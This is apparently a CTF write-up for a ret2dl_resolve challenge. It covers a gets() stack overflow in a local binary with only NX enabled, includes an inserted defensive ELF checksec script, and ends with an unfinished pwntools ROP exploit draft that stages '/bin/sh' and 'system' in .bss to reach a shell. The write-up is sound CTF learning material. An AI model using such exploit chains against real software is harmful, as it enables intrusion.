ret2dl_resolve, but I don't know how to do it yet…
First, as always, checksec: only NX is enabled:
As usual, drag it into IDA. main() is straightforward, just a plain gets():
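Since the whole technique hinges on which mitigations are present, here is an added example (not part of the original writeup, and not the checksec tool itself) that reads the same facts straight from the ELF program headers and dynamic section: whether PT_GNU_STACK denies execute (NX), and whether PT_GNU_RELRO plus DF_BIND_NOW / DF_1_NOW give Full RELRO. Lazy binding is what ret2dl_resolve relies on, so a binary that reports `lazy_binding: False` (Full RELRO) is the mitigated case. The ELF image it checks is constructed in `build_sample_elf`, a hypothetical minimal image built for this demonstration; pass a real file path on the command line to inspect an actual binary.

```python
import struct

# Program header types / dynamic tags and flag bits, as defined in the ELF spec (elf.h).
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
DT_NULL = 0
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def parse_phdrs(data):
    """Return the program headers of a little-endian ELF64 image as dicts."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    phdrs = []
    for i in range(e_phnum):
        fields = struct.unpack_from("<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        p_type, p_flags, p_offset, _vaddr, _paddr, p_filesz, _memsz, _align = fields
        phdrs.append({"type": p_type, "flags": p_flags, "offset": p_offset, "filesz": p_filesz})
    return phdrs


def dynamic_tags(data, phdrs):
    """Read the PT_DYNAMIC array (Elf64_Dyn = two u64s) into a {tag: value} dict."""
    tags = {}
    for ph in phdrs:
        if ph["type"] != PT_DYNAMIC:
            continue
        off, end = ph["offset"], ph["offset"] + ph["filesz"]
        while off + 16 <= end:
            d_tag, d_val = struct.unpack_from("<QQ", data, off)
            if d_tag == DT_NULL:
                break
            tags[d_tag] = d_val
            off += 16
    return tags


def checksec(data):
    """Report NX, RELRO level and whether the loader still binds PLT entries lazily."""
    phdrs = parse_phdrs(data)
    tags = dynamic_tags(data, phdrs)
    stack = [ph for ph in phdrs if ph["type"] == PT_GNU_STACK]
    # No PT_GNU_STACK at all means the kernel grants an executable stack.
    nx = bool(stack) and not (stack[0]["flags"] & PF_X)
    has_relro = any(ph["type"] == PT_GNU_RELRO for ph in phdrs)
    bind_now = bool(tags.get(DT_FLAGS, 0) & DF_BIND_NOW) or bool(tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    relro = "full" if (has_relro and bind_now) else ("partial" if has_relro else "none")
    return {"NX": nx, "RELRO": relro, "lazy_binding": not bind_now}


def build_sample_elf(stack_exec=False, relro=False, bind_now=False):
    """Constructed minimal ELF64 image (header, phdrs, dynamic array); not a real binary."""
    ehdr_size, phdr_size = 64, 56
    types = [PT_GNU_STACK, PT_DYNAMIC] + ([PT_GNU_RELRO] if relro else [])
    dyn_off = ehdr_size + phdr_size * len(types)
    dyn = struct.pack("<QQ", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<QQ", DT_NULL, 0)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS64, little-endian
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 3, 62, 1, 0, ehdr_size, 0, 0,
                               ehdr_size, phdr_size, len(types), 0, 0, 0)
    body = b""
    for t in types:
        flags = 6 | PF_X if (t == PT_GNU_STACK and stack_exec) else 6  # RW, plus X on request
        off, size = (dyn_off, len(dyn)) if t == PT_DYNAMIC else (0, 0)
        body += struct.pack("<IIQQQQQQ", t, flags, off, 0, 0, size, size, 8)
    return ehdr + body + dyn


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_elf()
    print(checksec(data))
```

With only NX set, as in this challenge, the report is `NX: True, RELRO: none, lazy_binding: True`; linking with `-Wl,-z,relro,-z,now` flips it to Full RELRO and removes the lazy-resolution path altogether.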
```c
// IDA decompiler output: an 8-byte stack buffer filled by gets() with no length check
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[8];

  gets(v4, argv, envp);
  return 0;
}
```
I wrote a rough first draft of the exp; it doesn't seem to work, so I'll come back and fix it when I have time…
```python
from pwn import *

p = process('./resolve')

offset = 0x8
bss = 0x404030
pop_rdi_ret = 0x4011C3
main_addr = 0x401136
gets_plt = 0x401040

# Stage 1: call gets() to read "/bin/sh" into bss + 0x200, then return to main
payload1 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(bss + 0x200) + p64(gets_plt) + p64(main_addr)
p.sendline(payload1)
p.sendline(b"/bin/sh")

# Stage 2: call gets() to read "system" into bss + 0x100, then return to main
payload2 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(bss + 0x100) + p64(gets_plt) + p64(main_addr)
p.sendline(payload2)
p.sendline(b"system")

# Stage 3 (unfinished draft as written)
payload3 = b'A' * offset + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(0x400408) + p64(gets_plt) + p64(pop_rdi_ret) + p64(bss + 0x200) + p64(gets_plt)
p.sendline(p32(bss + 0x100 - 0x400420) + b"\x12")

p.interactive()
```